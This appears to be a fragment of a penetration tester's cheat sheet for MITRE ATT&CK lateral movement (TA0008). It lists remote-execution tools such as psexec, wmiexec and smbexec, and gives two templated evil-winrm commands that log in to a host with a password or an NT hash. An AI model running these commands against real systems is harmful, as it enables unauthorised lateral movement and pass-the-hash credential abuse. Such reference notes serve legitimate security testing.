Mitre Att&ck Entreprise: TA0008 - Lateral Movement
** Administrative Services **
database
2. powershell
3. rcp
4. smb
atexec
dcomexec
psexec
smbexec
wmiexec
5. ssh
1. tcp
6. winrm
- Evil-winrm:
evil-winrm -i $ztarg_computer_ip -u $ztarg_user_name -p $ztarg_user_pass evil-winrm -i $ztarg_computer_ip -u $ztarg_user_name -H $ztarg_user_nthash